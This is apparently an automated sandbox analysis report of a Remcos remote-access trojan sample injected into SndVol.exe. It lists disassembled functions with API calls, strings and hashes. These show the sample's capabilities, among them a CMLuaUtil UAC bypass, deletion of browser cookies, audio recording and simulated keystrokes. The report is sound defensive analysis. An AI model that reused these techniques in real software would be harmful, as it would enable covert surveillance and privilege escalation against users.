Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00475338), ref: 0041CDA4
GetConsoleWindow.KERNEL32 ref: 0041CDAA
ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

Remcos v, xrefs: 0041CDFD
CONOUT$, xrefs: 0041CDD0
4.9.4 Pro, xrefs: 0041CE0B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Console$Window$AllocOutputShow
String ID: Remcos v$4.9.4 Pro$CONOUT$
API String ID: 4067487056-3065609815
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E

Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
__alloca_probe_16.LIBCMT ref: 0044ACDB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
__alloca_probe_16.LIBCMT ref: 0044ADC0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
__freea.LIBCMT ref: 0044AE30

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

__freea.LIBCMT ref: 0044AE39
__freea.LIBCMT ref: 0044AE5E

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

am/pm, xrefs: 004477A4
a/p, xrefs: 00447808
zD, xrefs: 004479AB

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Function 053655D7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 05365713

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: udp
API String ID: 0-4243565622
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: df31eabfaf2845e40e535da5efa2eac291ae342b76586d96a8099acd7a878bac
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: DD718C70608302CFDB25CF55D484A3AB7E6BF84651F84843EF886C7269EBB4C904CB92

Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456D49

Strings

D[E, xrefs: 00456D10
D[E, xrefs: 00456C6D, 00456D5E

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: D[E$D[E
API String ID: 269201875-3695742444
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D

Function 0535E4CC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 0536351D: TerminateProcess.KERNEL32(00000000,?,0535E4DC), ref: 0536352D
Part of subcall function 0536351D: WaitForSingleObject.KERNEL32(000000FF,?,0535E4DC), ref: 05363540

Part of subcall function 053643C5: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 053643E1
Part of subcall function 053643C5: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 053643FA
Part of subcall function 053643C5: RegCloseKey.ADVAPI32(?), ref: 05364405

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0535E526
ShellExecuteW.SHELL32(00000000,00466108,00000000,00466468,00466468,00000000), ref: 0535E685
ExitProcess.KERNEL32 ref: 0535E691

Strings

hdF, xrefs: 0535E66F
8SG, xrefs: 0535E4DC
exepath, xrefs: 0535E4FE

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: 8SG$exepath$hdF
API String ID: 1913171305-3379396883
Opcode ID: 838544f3cf5cb621be9cba50a81bf8f3131868f8d4be70fb518c48cf82230a5f
Instruction ID: 86c0e0ae60bf96b69768765774c32b8a791da99e541a2fa2f62a7719ecc23c97
Opcode Fuzzy Hash: 838544f3cf5cb621be9cba50a81bf8f3131868f8d4be70fb518c48cf82230a5f
Instruction Fuzzy Hash: CA419531B101185BCB18FB60EC98EFF7779BF11620F10516AF806A7090EF256E8ACA55

Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

_wcslen.LIBCMT ref: 0041B763

Strings

8SG, xrefs: 0041B709, 0041B70E
.exe, xrefs: 0041B6B5
program files\, xrefs: 0041B749, 0041B750, 0041B762
program files (x86)\, xrefs: 0041B75D
http\shell\open\command, xrefs: 0041B69A

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 3286818993-122982132
Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Function 00401D0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

.wav, xrefs: 00401D69
%Y-%m-%d %H.%M, xrefs: 00401D41

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
Opcode Fuzzy Hash: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E

Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
PathFileExistsA.SHLWAPI(?), ref: 0040BF78

Strings

[IE cookies not found], xrefs: 0040BF40
[IE cookies cleared!], xrefs: 0040BFC5, 0040BFEA
Cookies, xrefs: 0040BEFD
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BF02

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE

Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8

Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A

_free.LIBCMT ref: 00450F48

Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00450F53
_free.LIBCMT ref: 00450F5E
_free.LIBCMT ref: 00450FB2
_free.LIBCMT ref: 00450FBD
_free.LIBCMT ref: 00450FC8
_free.LIBCMT ref: 00450FD3

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\SndVol.exe), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 004075B0, 004075B3, 00407605
[+] before ShellExec, xrefs: 004075F1
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5
[+] ShellExec success, xrefs: 0040760E

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\SysWOW64\SndVol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-991305910
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
GetLastError.KERNEL32 ref: 0040BAE7

Strings

UserProfile, xrefs: 0040BAAD
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
[Chrome Cookies not found], xrefs: 0040BB01
[Chrome Cookies found, cleared!], xrefs: 0040BB0D

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE

Function 0536E12A Relevance: 10.5, APIs: 7, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0536E143

Part of subcall function 0536E1DC: RegisterClassExA.USER32(00000030), ref: 0536E228
Part of subcall function 0536E1DC: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0536E243
